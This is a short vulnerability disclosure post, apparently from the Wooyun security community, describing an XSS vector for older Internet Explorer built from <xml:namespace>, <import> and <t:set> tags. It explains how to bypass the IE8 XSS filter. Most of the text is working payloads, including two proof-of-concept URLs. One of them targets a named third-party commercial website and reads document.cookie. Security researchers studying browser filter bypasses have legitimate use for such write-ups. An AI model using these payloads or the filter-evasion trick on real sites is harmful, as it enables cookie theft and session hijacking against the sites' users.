Note: IE 10 have fixed this issue,and IE8 ...

-------------------------------------------------

1. a <?import ... > tag can also be written as a <import ...> tag.

<html>     
<body>     
<div>     
<div id="x">x</div>     
<xml:namespace prefix="t">     
<import namespace="t" implementation="#default#time2">     
<t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">    
 </div>     
</body>     
</html>

the code above will execute script fragment in "to" attribute.

Furthermore, we found this xss vector contructed from the three tags (<xml> <import> & <t:set ...>) can bypass the IE8 xss filter.

------------------------------------------------

POC1: use <import ...>

http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>

while  using <?import ...> will trigger the xss filter to intercept our code.

2. Our code should start with ">, when we encounter the  case like : <input type="text" value="{parameter under controlled}">. The "> will trigger the xss filter, and it will replace some words like 'namespace' and 'attributeName' in our code. My friend @jackmasa (https://twitter.com/jackmasa)(@Sogili in Wooyun.org) gave me a trick to solve the problem:  "x> (x represents any letter) cannot trigger the filter.

-------------------------------------------------

POC2:

http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>

That's all. Thanks for help from my friend jackmasa (@Sogili in Wooyun.org).

Author: Gainover

Group:  PKAV .net & Wooyun.org

From: http://zone.wooyun.org/content/1411